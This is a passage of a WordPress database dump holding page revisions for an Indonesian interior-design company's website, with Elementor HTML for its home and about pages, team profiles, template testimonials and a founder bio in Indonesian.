src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:50:34','2023-09-22 08:50:34','',22,'https://bauhaus.futuremediatrix.com/?p=4870',0,'revision','',0),(4871,3,'2023-09-22 08:52:21','2023-09-22 08:52:21','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:52:21','2023-09-22 08:52:21','',38,'https://bauhaus.futuremediatrix.com/?p=4871',0,'revision','',0),(4872,3,'2023-09-22 08:52:21','2023-09-22 08:52:21','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:52:21','2023-09-22 08:52:21','',38,'https://bauhaus.futuremediatrix.com/?p=4872',0,'revision','',0),(4873,3,'2023-09-22 08:52:21','2023-09-22 08:52:21','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n	